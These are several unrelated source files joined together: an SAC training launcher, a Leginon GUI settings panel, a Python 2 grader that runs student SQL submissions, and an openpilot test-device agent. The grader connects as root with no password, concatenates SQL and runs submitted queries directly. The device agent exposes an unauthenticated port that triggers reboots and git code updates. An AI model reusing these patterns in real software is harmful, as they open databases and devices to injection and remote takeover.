def run_experiment(experiment_id):
SAC(
HalfCheetahEnv,
logging_dir="./half_cheetah/sac/{}".format(experiment_id),
hidden_size=256,
num_hidden_layers=2,
num_threads=10,
max_path_length=1000,
max_num_steps=1000000,
reward_scale=1.0,
discount=0.99,
tau=0.005,
policy_delay=1,
initial_alpha=0.01,
qf_learning_rate=0.0003,
policy_learning_rate=0.0003,
batch_size=256,
num_epochs=10000,
num_episodes_per_epoch=1,
num_trains_per_epoch=1000,
num_episodes_before_train=10,
num_epochs_per_eval=10,
num_episodes_per_eval=10).launch()
if __name__ == "__main__":
num_seeds = 5
for seed in range(num_seeds):
multiprocessing.Process(target=run_experiment, args=(seed,)).start()
|
TiltTracker.py
|
# The Leginon software is Copyright 2004
# The Scripps Research Institute, La Jolla, CA
# For terms of the license agreement
# see http://ami.scripps.edu/software/leginon-license
#
import threading
import wx
from leginon.gui.wx.Choice import Choice
from leginon.gui.wx.Entry import Entry, FloatEntry, IntEntry, EVT_ENTRY
from leginon.gui.wx.Presets import EditPresetOrder
from leginon.gui.wx.Presets import PresetChoice
import leginon.gui.wx.Acquisition
import leginon.gui.wx.Dialog
import leginon.gui.wx.Events
import leginon.gui.wx.Icons
import leginon.gui.wx.TargetPanel
import leginon.gui.wx.ToolBar
import leginon.gui.wx.FocusSequence
class Panel(leginon.gui.wx.Acquisition.Panel):
icon = 'focuser'
imagepanelclass = leginon.gui.wx.TargetPanel.TargetImagePanel
def __init__(self, *args, **kwargs):
leginon.gui.wx.Acquisition.Panel.__init__(self, *args, **kwargs)
self.toolbar.AddSeparator()
self.toolbar.AddTool(leginon.gui.wx.ToolBar.ID_ACQUIRE, 'acquire', shortHelpString='Acquire')
# correlation image
self.imagepanel.addTypeTool('Correlation', display=True)
self.imagepanel.addTargetTool('Peak', wx.Colour(255, 128, 0))
self.toolbar.Bind(wx.EVT_TOOL, self.onAcquireTool, id=leginon.gui.wx.ToolBar.ID_ACQUIRE)
self.szmain.Layout()
def onSettingsTool(self, evt):
dialog = SettingsDialog(self,show_basic=True)
dialog.ShowModal()
dialog.Destroy()
def onAcquireTool(self, evt):
threading.Thread(target=self.node.testAcquire).start()
class SettingsDialog(leginon.gui.wx.Acquisition.SettingsDialog):
    def initialize(self):
        return ScrolledSettings(self,self.scrsize,False,self.show_basic)

class ScrolledSettings(leginon.gui.wx.Acquisition.ScrolledSettings):
    def initialize(self):
        sizers = leginon.gui.wx.Acquisition.ScrolledSettings.initialize(self)
        if self.show_basic:
            sbsz = self.addBasicTiltSettings()
        else:
            sbsz = self.addTiltSettings()
        return sizers + [sbsz]

    def addTiltSettings(self):
        sb = wx.StaticBox(self, -1, 'Tilt Options')
        sbsz = wx.StaticBoxSizer(sb, wx.VERTICAL)
        sizer = wx.GridBagSizer(5, 4)
        bordersize = 3
        label = wx.StaticText(self, -1, 'Activation Interval')
        sizer.Add(label, (0, 0), (1, 2), wx.ALIGN_CENTER_VERTICAL)
        self.widgets['activation interval'] = IntEntry(self, -1, chars=5, style=wx.ALIGN_RIGHT)
        sizer.Add(self.widgets['activation interval'], (0,2), (1,2), wx.ALL|wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, bordersize)
        label = wx.StaticText(self, -1, 'List of Tilts to Collect (in degrees)')
        sizer.Add(label, (1, 0), (1, 2), wx.ALIGN_CENTER_VERTICAL)
        self.widgets['tilts'] = Entry(self, -1, chars=15, style=wx.ALIGN_RIGHT)
        sizer.Add(self.widgets['tilts'], (1,2), (1,2), wx.ALL|wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, bordersize)
        label = wx.StaticText(self, -1, 'Maximum Tilt Stepsize (in degrees)')
        sizer.Add(label, (2, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
        self.widgets['stepsize'] = IntEntry(self, -1, chars=2, value='15')
        sizer.Add(self.widgets['stepsize'], (2,1), (1,1), wx.ALL|wx.ALIGN_CENTER_VERTICAL, bordersize)
        label = wx.StaticText(self, -1, 'Pause Between Steps')
        sizer.Add(label, (2, 2), (1, 1), wx.ALIGN_CENTER_VERTICAL)
        self.widgets['pause'] = FloatEntry(self, -1, chars=2, value='1')
        sizer.Add(self.widgets['pause'], (2,3), (1,1), wx.ALL|wx.ALIGN_CENTER_VERTICAL, bordersize)
        label = wx.StaticText(self, -1, 'Min Feature Size')
        sizer.Add(label, (3,0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
        self.widgets['minsize'] = FloatEntry(self, -1, chars=6, value='0.0')
        sizer.Add(self.widgets['minsize'], (3,1), (1,1), wx.ALL|wx.ALIGN_CENTER_VERTICAL, bordersize)
        label = wx.StaticText(self, -1, 'Max Feature Size')
        sizer.Add(label, (3, 2), (1, 1), wx.ALIGN_CENTER_VERTICAL)
        self.widgets['maxsize'] = FloatEntry(self, -1, chars=6, value='0.0')
        sizer.Add(self.widgets['maxsize'], (3,3), (1,1), wx.ALL|wx.ALIGN_CENTER_VERTICAL, bordersize)
        label = wx.StaticText(self, -1, 'Median Filter (pixels)')
        sizer.Add(label, (4, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
        self.widgets['medfilt'] = IntEntry(self, -1, chars=2, value='0')
        sizer.Add(self.widgets['medfilt'], (4,1), (1,1), wx.ALL|wx.ALIGN_CENTER_VERTICAL, bordersize)
        label = wx.StaticText(self, -1, 'LowPass Filter (pixels)')
        sizer.Add(label, (4, 2), (1, 1), wx.ALIGN_CENTER_VERTICAL)
        self.widgets['lowfilt'] = FloatEntry(self, -1, chars=2, value='0.0')
        sizer.Add(self.widgets['lowfilt'], (4,3), (1,1), wx.ALL|wx.ALIGN_CENTER_VERTICAL, bordersize)
        label = wx.StaticText(self, -1, 'Drift threshold')
        sizer.Add(label, (5, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
        self.widgets['drift threshold'] = FloatEntry(self, -1, chars=6, value='0.0')
        sizer.Add(self.widgets['drift threshold'], (5,1), (1,1), wx.ALL|wx.ALIGN_CENTER_VERTICAL, bordersize)
        label = wx.StaticText(self, -1, 'Drift preset')
        sizer.Add(label, (5, 2), (1, 1), wx.ALIGN_CENTER_VERTICAL)
        presets = self.node.presetsclient.getPresetNames()
        self.widgets['drift preset'] = PresetChoice(self, -1)
        self.widgets['drift preset'].setChoices(presets)
        sizer.Add(self.widgets['drift preset'], (5,3), (1,1), wx.ALL|wx.ALIGN_CENTER_VERTICAL, bordersize)
        sbsz.Add(sizer, 0, wx.ALIGN_CENTER|wx.ALL, 2)
        return sbsz

    def addBasicTiltSettings(self):
        sb = wx.StaticBox(self, -1, 'Tilt Options')
        sbsz = wx.StaticBoxSizer(sb, wx.VERTICAL)
        sizer = wx.GridBagSizer(5, 4)
        bordersize = 3
        label = wx.StaticText(self, -1, 'Activation Interval')
        sizer.Add(label, (0, 0), (1, 2), wx.ALIGN_CENTER_VERTICAL)
        self.widgets['activation interval'] = IntEntry(self, -1, chars=5, style=wx.ALIGN_RIGHT)
        sizer.Add(self.widgets['activation interval'], (0,2), (1,2), wx.ALL|wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, bordersize)
        label = wx.StaticText(self, -1, 'List of Tilts to Collect (in degrees)')
        sizer.Add(label, (1, 0), (1, 2), wx.ALIGN_CENTER_VERTICAL)
        self.widgets['tilts'] = Entry(self, -1, chars=15, style=wx.ALIGN_RIGHT)
        sizer.Add(self.widgets['tilts'], (1,2), (1,2), wx.ALL|wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, bordersize)
        label = wx.StaticText(self, -1, 'Min Feature Size')
        sizer.Add(label, (2,0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
        self.widgets['minsize'] = FloatEntry(self, -1, chars=6, value='0.0')
        sizer.Add(self.widgets['minsize'], (2,1), (1,1), wx.ALL|wx.ALIGN_CENTER_VERTICAL, bordersize)
        label = wx.StaticText(self, -1, 'Max Feature Size')
        sizer.Add(label, (2, 2), (1, 1), wx.ALIGN_CENTER_VERTICAL)
        self.widgets['maxsize'] = FloatEntry(self, -1, chars=6, value='0.0')
        sizer.Add(self.widgets['maxsize'], (2,3), (1,1), wx.ALL|wx.ALIGN_CENTER_VERTICAL, bordersize)
        label = wx.StaticText(self, -1, 'Median Filter (pixels)')
        sizer.Add(label, (3, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
        self.widgets['medfilt'] = IntEntry(self, -1, chars=2, value='0')
        sizer.Add(self.widgets['medfilt'], (3,1), (1,1), wx.ALL|wx.ALIGN_CENTER_VERTICAL, bordersize)
        label = wx.StaticText(self, -1, 'LowPass Filter (pixels)')
        sizer.Add(label, (3, 2), (1, 1), wx.ALIGN_CENTER_VERTICAL)
        self.widgets['lowfilt'] = FloatEntry(self, -1, chars=2, value='0.0')
        sizer.Add(self.widgets['lowfilt'], (3,3), (1,1), wx.ALL|wx.ALIGN_CENTER_VERTICAL, bordersize)
        sbsz.Add(sizer, 0, wx.ALIGN_CENTER|wx.ALL, 2)
        return sbsz
|
grader.py
|
#!/usr/bin/python
import sys
import os
from multiprocessing import Process
import time
import threading
import MySQLdb

# Glossary of the Indonesian names used below: kunci = (answer) key,
# jawaban = answer, nilai = score, hasil = result, tanda = flag,
# berhenti = stop.

# The module named in argv[3] supplies the connection used to run both the
# submitted query and the answer-key query; the remaining argv entries are
# key/value pairs passed through as keyword arguments to its connect().
moduleNames = [str(sys.argv[3])]
modules = map(__import__, moduleNames)
dct = {}
for x in xrange(4,len(sys.argv),2):
    if (sys.argv[x+1] == "''"): sys.argv[x+1] = ""
    dct[str(sys.argv[x])] = sys.argv[x+1]
db_kunci = modules[0].connect(**dct)
cursor_kunci = db_kunci.cursor()
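
# check(submission_id): fetch the submitted SQL (jawaban) for one submission,
# run it and the reference answer for the same question on the answer-key
# connection, and compare the two result sets cell by cell.  A full match
# scores nilai = 100, any mismatch or error scores nilai = 0; status = 1
# marks the submission as graded.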
def check(submission_id):
    try:
        db= MySQLdb.connect('localhost', 'root', '', 'sbd')
        cursor = db.cursor()
        sql = '''select question_id, jawaban from submission where id = '''+str(submission_id)
        cursor.execute(sql)
        unchecked = cursor.fetchone()
        sub_id = submission_id
        ques_id = ''
        ans = ''
        tanda = 0
        while unchecked is not None:
            ques_id = unchecked[0]
            ans = unchecked[1]
            unchecked = cursor.fetchone()
        ans = ans.replace(';', '')
        cursor_kunci.execute(ans)
        results = cursor_kunci.fetchall()
        num_fields = len(cursor_kunci.description)
        hasil=[[0 for x in range(num_fields)] for x in range(10000)]
        rows=0
        for res in results:
            for column in range(num_fields):
                hasil[rows][column] = res[column]
            rows+=1
        kunci = '''select jawaban from question where id='''+ str(ques_id)
        cursor.execute(kunci)
        temp = cursor.fetchone()
        while temp is not None:
            temp_kunci = temp[0]
            temp_kunci = temp_kunci.replace(';', '')
            temp = cursor.fetchone()
        cursor_kunci.execute(temp_kunci)
        res_kunci = cursor_kunci.fetchall()
        num_fields_1 = len(cursor_kunci.description)
        arr_kunci=[[0 for x in range(num_fields_1)] for x in range(10000)]
        row_kunci=0
        for res_key in res_kunci:
            for column_kunci in range(num_fields_1):
                arr_kunci[row_kunci][column_kunci] = res_key[column_kunci]
            row_kunci+=1
        flag=0
        if (num_fields != num_fields_1):
            flag=1
        if (rows != row_kunci):
            flag=1
        if (flag==0):
            for row_compare in range(row_kunci):
                for column_compare in range(num_fields):
                    if (hasil[row_compare][column_compare]!=arr_kunci[row_compare][column_compare]):
                        #print hasil[row_compare][column_compare]
                        #print arr_kunci[row_compare][column_compare]
                        flag=1
        if (flag==1):
            update1 = '''update submission set nilai = 0, status = 1 where id = '''+str(sub_id)
            cursor.execute(update1)
            db.commit()
            print 'query '+str(sub_id)+' failed'
        elif (flag==0):
            update2 = '''update submission set nilai = 100, status = 1 where id = '''+str(sub_id)
            cursor.execute(update2)
            db.commit()
            print 'query '+str(sub_id)+' success'
        #print "keluar"
        return
    except:
        #print str(sub_id)+' Failed : '+ str(e) + ' ' + str(temp_kunci)
        print 'except '+str(sub_id)
        db.rollback()
        update1 = '''update submission set nilai = 0, status = 1 where id = '''+str(sub_id)
        cursor.execute(update1)
        db.commit()
        return
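
# stopwatch(timeout, target, args): run the grader in a separate process and
# poll once a second; if it has not finished after `timeout` seconds the
# submission is marked TLE (nilai = 101) and the process is terminated.
# Uses the db/cursor opened by the main loop below.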
def stopwatch(timeout, target, args):
    p = Process(target=target, args=args)
    sub_id = args[0]
    p.start()
    for x in xrange(0,timeout):
        time.sleep(1)
        #print p.is_alive()
        if(p.is_alive() == False):
            return
    print 'TLE '+str(sub_id)
    db.rollback()
    updateTLE = '''update submission set nilai = 101, status = 1 where id = '''+str(sub_id)
    cursor.execute(updateTLE)
    db.commit()
    p.terminate()
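
# Main loop: poll the submission table for the oldest ungraded submission for
# the database version given in argv[2], grade it under the stopwatch
# watchdog, then repeat until interrupted.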
if __name__ == '__main__':
    try:
        while True:
            db= MySQLdb.connect('localhost', 'root', '', 'sbd')
            cursor = db.cursor()
            #try:
            sql = '''select s.id, s.question_id, s.users_id, s.jawaban, s.status from submission s,event e, listdb ldb, question q where s.question_id = q.id and q.event_id = e.id and e.listdb_id = ldb.id and s.status = 0 and ldb.dbversion_id = '''+sys.argv[2]+''' having s.id = min(s.id)'''
            cursor.execute(sql)
            unchecked = cursor.fetchone()
            sub_id = ''
            ques_id = ''
            user_id = ''
            ans = ''
            stat = ''
            tanda = 0
            while unchecked is not None:
                sub_id = unchecked[0]
                ques_id = unchecked[1]
                user_id = unchecked[2]
                ans = unchecked[3]
                stat = unchecked[4]
                unchecked = cursor.fetchone()
            if (sub_id!='') :
                tanda = 1
            if (tanda==1):
                t = threading.Thread(target=stopwatch, args=(20,check,(str(sub_id),)))
                t.start()
                time.sleep(1)
                t.join()
                print "next"
            #time.sleep(1)
            db.close()
        db_kunci.close()
    except KeyboardInterrupt:
        sys.exit(0)
    except:
        #print str(sub_id)+' Outer Failed : '+ str(e)
        print 'berhenti'
|
eon_testing_slave.py
|
#!/usr/bin/env python3
import re
import time
import json
import requests
import subprocess
from common.timeout import Timeout
from http.server import BaseHTTPRequestHandler, HTTPServer
from os.path import expanduser
from threading import Thread
from selfdrive.manager import unblock_stdout
from common.params import Params
import os

if __name__ == "__main__":
    unblock_stdout()

MASTER_HOST = "testing.comma.life"

def get_workdir():
    continue_sh = open('/data/data/com.termux/files/continue.sh').read()
    for l in continue_sh.split('\n'):
        if l.startswith('#'):
            continue
        if 'cd "$HOME/one"' in l:
            work_dir = expanduser('~/one')
            return work_dir
    work_dir = '/data/openpilot'
    return work_dir
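
# heartbeat(): every few seconds, report this device's openpilot version,
# git remote/revision, serial number and recent tmux output to MASTER_HOST
# so the test master knows the EON is alive.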
def heartbeat():
    work_dir = get_workdir()
    env = {
        "LD_LIBRARY_PATH": "",
        "ANDROID_DATA": "/data",
        "ANDROID_ROOT": "/system",
    }
    while True:
        try:
            with open(os.path.join(work_dir, "selfdrive", "common", "version.h")) as _versionf:
                version = _versionf.read().split('"')[1]
            # subprocess.check_output(["/system/bin/screencap", "-p", "/tmp/screen.png"], cwd=work_dir, env=env)
            # screenshot = base64.b64encode(open('/tmp/screen.png').read())
            tmux = ""
            try:
                tmux = os.popen('tail -n 100 /tmp/tmux_out').read()
            except:
                pass
            params = Params()
            msg = {
                'version': version,
                'dongle_id': params.get("DongleId").rstrip().decode('utf8'),
                'remote': subprocess.check_output(["git", "config", "--get", "remote.origin.url"], cwd=work_dir).decode('utf8').rstrip(),
                'revision': subprocess.check_output(["git", "rev-parse", "HEAD"], cwd=work_dir).decode('utf8').rstrip(),
                'serial': subprocess.check_output(["getprop", "ro.boot.serialno"]).decode('utf8').rstrip(),
                # 'screenshot': screenshot,
                'tmux': tmux,
            }
            with Timeout(10):
                requests.post('http://%s/eon/heartbeat/' % MASTER_HOST, json=msg, timeout=5.0)
        except Exception as e:
            print("Unable to send heartbeat", e)
        time.sleep(5)
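
# Control API served on port 8080: GET reports liveness, POST takes a JSON
# body carrying this device's dongle_id and a 'command' of "reboot" or
# "update" (optionally pinned to a git revision).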
class HTTPHandler(BaseHTTPRequestHandler):
    def _set_headers(self, response=200, content='text/html'):
        self.send_response(response)
        self.send_header('Content-type', content)
        self.end_headers()

    def do_GET(self):
        self._set_headers()
        # wfile expects bytes in Python 3
        self.wfile.write(b"EON alive")

    def do_HEAD(self):
        self._set_headers()

    def do_POST(self):
        # Reply immediately with 204; the response itself carries no data.
        self._set_headers(response=204)
        content_length = int(self.headers['Content-Length'])
        post_data = self.rfile.read(content_length)
        post_data = json.loads(post_data)
        if 'command' not in post_data or 'dongle_id' not in post_data:
            return
        params = Params()
        # Params values are bytes; decode before comparing to the JSON string.
        if params.get("DongleId").rstrip().decode('utf8') != post_data['dongle_id']:
            return
        if post_data['command'] == "reboot":
            subprocess.check_output(["reboot"])
        if post_data['command'] == "update":
            print("Pulling new version")
            work_dir = get_workdir()
            env = {
                "GIT_SSH_COMMAND": "ssh -i /data/gitkey",
                "LD_LIBRARY_PATH": "/data/data/com.termux/files/usr/lib/",
                "ANDROID_DATA": "/data",
                "ANDROID_ROOT": "/system",
            }
            subprocess.check_output(["git", "reset", "--hard"], cwd=work_dir, env=env)
            # subprocess.check_output(["git", "clean", "-xdf"], cwd=work_dir, env=env)
            try:
                subprocess.check_output(["git", "fetch", "--unshallow"], cwd=work_dir, env=env)
            except subprocess.CalledProcessError:
                pass
            if 'revision' in post_data and re.match(r'\b[0-9a-f]{5,40}\b', post_data['revision']):
                subprocess.check_output(["git", "fetch", "origin"], cwd=work_dir, env=env)
                subprocess.check_output(["git", "checkout", post_data['revision']], cwd=work_dir, env=env)
            else:
                subprocess.check_output(["git", "pull"], cwd=work_dir, env=env)
            subprocess.check_output(["git", "submodule", "update"], cwd=work_dir, env=env)
            subprocess.check_output(["git", "lfs", "pull"], cwd=work_dir, env=env)
            subprocess.check_output(["reboot"], cwd=work_dir, env=env)

def control_server(server_class=HTTPServer, handler_class=HTTPHandler, port=8080):
    server_address = ('', port)
    httpd = server_class(server_address, handler_class)
    print('Starting httpd...')
    httpd.serve_forever()

if __name__ == "__main__":
    control_thread = Thread(target=control_server)
    control_thread.daemon = True
    control_thread.start()
    heartbeat()
|